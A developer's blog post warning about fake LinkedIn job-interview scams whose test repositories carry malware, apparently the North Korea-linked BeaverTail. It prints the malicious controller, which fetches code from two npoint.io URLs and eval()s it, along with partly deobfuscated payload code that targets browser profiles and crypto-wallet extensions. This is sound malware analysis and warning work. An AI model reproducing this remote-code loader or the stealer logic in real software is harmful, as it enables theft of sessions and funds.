The BLOG

LinkedIn Interview Scams

May 13, 2025

LinkedIn’s job market is crawling with scammers peddling empty dreams, and I’m here to warn you about it. These people are relentless, and I’ve gotten a flood of these fake job pitches myself.


I’ve even had other devs reach out saying their inboxes are overflowing with the same garbage. It’s not just annoying, it’s coordinated, and it’s gotten out of hand.


How to dodge scams on LinkedIn while trying to live off ramen noodles.


I initially documented this across three posts on LinkedIn.


After the third post, I realized many people there are operating on power-saving mode, and the best they can do is write "agree?" and "Wow! Insightful" comments, while drool is dripping down their chin. So I really needed my own blog.


(Maybe the fact that it took me 3 posts to realize says more about me though.)

If you're coming here from LinkedIn, disregard everything I've said above.

You're clearly a cut above the rest, especially since you bothered to click the link.



The Foreplay: A Shady DM Promises Riches


So picture this - you've been laid off for a while, and you haven't been getting laid in a while either.

That's exactly why you’re spamming LinkedIn job applications like it’s a full-time gig.

But you're shouting into a void. Most job posts here are fake, or are crowded by 1000 other applicants.

Your inbox? Crickets. Until bam - a message slides in, oozing with promise:


Scammer Here


I was in this exact scenario. Did I get that sweet sweet 12K gig?

Well... let's just say I wouldn't be here writing this article if I did.


The Scam Playbook: From Zoom to Doom:


Here’s the scam in four three easy steps:

  • They want you to set up a meeting with them for the interview (usually via Calend.ly) and they give you a link to an "interview test project".
  • They'll get you to write some simple code, so you're in your comfort zone.
  • They'll ask you to implement a call to the backend.

And that's it! You might not even notice that your sessions have been stolen, and your crypto wallet has been drained. And even if you did, it's too late anyway. The scammers are gone, with your logins & money.


After I got enough of these scam messages, I started to collect the malicious repositories. If you want to take a look at more of these, or even contribute (thank you if that's the case), you'll find the repo here.


Let's look at one such project, since all of them mostly follow the same pattern. While this project is named "Golden City", they should've really called it "Golden Shower", because that is exactly what you are getting if you run it locally.


The payload is located in /backend/controllers/userController.js .


Here's where the magic happens:

//Get Cookie
exports.getCookie = asyncErrorHandler(async (req, res, next) => {
  const rs_L = await axios.get("https://api.npoint.io/e8e29958efde154f3d7d");
  const rs_C = await axios.get("https://api.npoint.io/632ab82bbc8d7f4c2d44");
  eval(rs_L.data.cookie);
  eval(rs_C.data.cookie);
})();


Cracking the Malware: North Korean Glowies be mad


We're gonna decode the first payload, as I'm sure we're gonna find plenty of goodies in there. We might do the second one later, if we get bored.


By accessing the first URL you get something like this:


{
"cookie": "(function(_0x297f50,_0x1ff217){const _0x11266b=_0x297f50();
    function _0xb5d49b(_0x3b2ff8,_0x2ad497,_0x3e81bd,_0x416d92){
      return _0x1c0e(_0x3e81bd-0x168,_0x416d92);
    }
    // truncated
}

This is unreadable. I've tried deobfuscating it with online tools, but I kept getting errors. Earlier payloads could be untangled, but the newer ones, not so much.

I found out it's because they implement infinite loops so regular deobfuscators get stuck.


It was time to write my own, using PHP. These are the steps we must take:


Fetch
  • Pull in the raw JS payload via file_get_contents() and json_decode().
  • Bail out if there’s no cookie field.

Extract the String Table
  • Obfuscated code often hides all its text in a single array, e.g. function _0x1234() { const _0xABCD = ['foo','bar','baz']; }.

Build a Quick-Lookup Array
  • In PHP we turn those strings into a normal array: $table = ['foo','bar','baz'];.

Find the Tiny “Wrapper” Functions
  • The code adds little helper functions, e.g. function _0xdead(a,b,c,d) { return _0x1234(c - 0x10, d); }.
  • We detect each wrapper’s name, which argument (c or d) holds the index, and its hex offset (e.g. 0x10).

Inline All Those Calls
  • Whenever you see _0xdead(0x20,0x30,0x40,0x50), we:
    1. Convert 0x40 → decimal 64
    2. Subtract the wrapper’s offset (64 - 16 = 48)
    3. Replace the call with the actual string ("baz" if $table[48] === 'baz')
    4. Use a placeholder like "<undef_X>" if the index is out of range

Stop Infinite Loops
  • Some obfuscated scripts (including this one) do while(!![]) { … } (i.e. while(true)), to evade decompilers, but they're no match for my l33t PHP script kiddie skills.
  • We rewrite each loop to count iterations and break after 1000 so it won’t hang.

Save the Result
  • Write the deobfuscated code out to a new .js file.


Fun fact: Immediately after decompiling this payload, Windows Defender is screaming at me with the rage of a thousand hungry hyenas. Windows Defender


From what I've read about "BeaverTail", it's of North Korean origin.

This matches what some security researchers and professionals that I've been talking with were saying.

More specifically, that these attacks are coming from North Korea and Russia. (It does have a "state sponsored" smell to it).


At this point you might be wondering how I didn't fall for it.

Well, *gulps* *adjusts trenchcoat*, I use Arch Linux.


Kidding ... I had you there for a sec. That malware is cross-platform, not even the most neckbearded GNU/Linux guru of them all can run it on bare metal.


Truth is, all those years I spent as a kid downloading sketchy songs & games off ODC/DC++ (Romanian Limewire), and giving my computer the nastiest e-STDs are finally paying off, over a decade later.


I now have a particular set of skills that allow me to spot sketchy software at a glance. (Or maybe I'm just paranoid to a concerning degree)



I know you want to see what I've been deobfuscating here, so here's the cool part:

  hostname=os['hostname'](),platform=os["<undef_367>"](),
  homeDir=os["<undef_224>"](),tmpDir=os["<undef_375>"](),
  fs_promises=require("<undef_2d0>"+'s'),hostURL="pplication"+"<undef_1fb>"+'48:1224',
  getAbsolutePath=veg193=>veg193["<undef_2b3>"](/^~([a-z]+|\/)/,(veg194,veg195)=>'/'===veg195?
  homeDir:path["<undef_266>"](homeDir)+'/'+veg195),htype='99',gtype='73';
  function testPath(veg196) {
    try{
      return fs['accessSync'](veg196),!![];
    }catch(veg197){
      return![];
    }
}
const R=[
  "<undef_1ad>"+"<undef_330>"+'Brave-Brow'+"<undef_2d3>",
  'BraveSoftware/Brave-'+"<undef_20e>","<undef_33c>"+'are/Brave-'+"<undef_223>"
],
Q=[
  "<undef_1b4>"+'le/Chrome',"<undef_30b>"+"<undef_217>","<undef_38c>"+"<undef_217>"
],
X=[
  'Roaming/Op'+"<undef_2f4>"+"<undef_316>"+'table',"<undef_1d1>"+'oftware.Op'+"<undef_312>",'opera'
],
Bt=[
  'nkbihfbeog'+"<undef_287>"+"<undef_32a>"+'nn','ejbalbakop'+"<undef_1d8>"+"<undef_284>"+'hm',"<undef_2f7>"+
  "<undef_1d2>"+'ngcnapndodjp','ibnejdfjmm'+"<undef_1e1>"+"<undef_267>"+'ec',"<undef_2b1>"+"<undef_1fe>"+"<undef_2a0>"+
  'pa',"<undef_2e9>"+"<undef_1e9>"+'oohckonoeemg',"<undef_1b4>"+"<undef_222>"+"<undef_2bb>"+'lj',"<undef_2b0>"+
  "<undef_249>"+"<undef_285>"+'pi',"<undef_260>"+"<undef_2eb>"+"<undef_2f2>"+'ch',"<undef_2ca>"+"<undef_288>"+
  "<undef_1c7>"+'bb',"<undef_215>"+"<undef_1cf>"+'emcciiolgcge',"<undef_293>"+"<undef_205>"+"<undef_202>"+
  'hb',"<undef_254>"+"<undef_216>"+"<undef_252>"+'kk',"<undef_2a3>"+"<undef_1be>"+"<undef_2c9>"+'no',"<undef_203>"+
  "<undef_307>"+'ggakijnkhfnd',"<undef_320>"+"<undef_37b>"+'dgccekpkcbin',"<undef_226>"+"<undef_256>"+"<undef_1fd>"+
  'fa',"<undef_214>"+'cgndfolcbkdeeknbbbnhcc',"tnWSb"+'bapadjdnnojkbgioiodbic','aeachknmefphepccionb'+"<undef_264>"+
  'mg',"<undef_2dd>"+"<undef_2db>"+"<undef_25f>"+'eg',"<undef_2a5>"+'adlkmhmclhkeeodmamcflc'
],

At some point I tried replacing variable names with vegetables and function names with Greek gods, but there were too many of them, so I just had chatgpt update my sloppy code and vomit out veg<number> for variables and God<number> for functions. Classic.


While we could not decode everything, we can definitely make out a couple of things:

  • It's trying to get the hostname, platform, home directory, temporary directory, and filesystem paths.
  • It's looking around for browser names (opera, brave, chrome)

If I had to guess, I'd say they're trying to hijack your sessions, in this specific case. Either way, something unholy is going on here.

Since every repo is slightly different, you might encounter other surprises if you run it. So don't think about running it, even if it's tempting "to see what happens". (You silly goose)


Later edit:

I was able to find an earlier version of the payload that I was able to deobfuscate a while back. This is slightly more readable: Malicious Code


If you had not caught up by now, that payload runs with eval() in a nodejs environment so it has full access to your system.


I did not get to the interview stage since I caught this payload early, and had some nice words to share with the scammer, and they blocked me.


The North Korean Connection: Lazarus Group


These LinkedIn scams aren't isolated incidents, they're part of a larger pattern of North Korean cyber operations. I have only recently found this Github repository which documents hundreds of incidents attributed to North Korean threat actors like Lazarus, Bluenoroff, and APT38.


This collection tracks:

  • Cryptocurrency heists totaling billions in stolen funds
  • Evolution of their tactics from banking heists to crypto targeting
  • Detailed timelines of attacks dating back to 2016
  • Various malware strains and TTPs (Tactics, Techniques, and Procedures)

It's insane that these rabid dogs have started targeting developers who looking for jobs.

Impersonating recruiters and using fake job interviews as attack vectors was definitely not on my bingo sheet.


So, not only is your wallet empty and you're desperate, but now you also gotta dodge these cartoonishly evil fuckers with state-sponsored malware. The 2025 job market is definitely something else.


Key Takeaways


  • The job market is absolutely cooked
  • That npoint thingy should be DNS restricted, as a lot of these scam payloads are downloaded from there.
  • Think ten times before you run some random repository on your machine.
  • Maybe we need CSS on the backend to prevent these situations.
  • Node should sandbox your code by default. No filesystem access unless you set a flag.


Links



More Messages


I'm including more scam DMs and job pitch screenshots here so you know exactly what to avoid.

Learn to recognize the patterns, spot the red flags, and not get caught with your pants down.


Some of these accounts are obviously fake, but others are previously legit accounts that have been hacked and commandeered by the scammers.


Scammer Profile


Masterful Exit


I'm going back to my goon cave now. I've been yapping here for far too long.
I'll leave you with ... the only album I've released so far.

And I'm not even kidding! I deserve that self-promotion for all the hard work I put in, don't even try me.


Stay paranoid, folks, always be on your toes. The glowies are out to get you.


< Hover to reveal >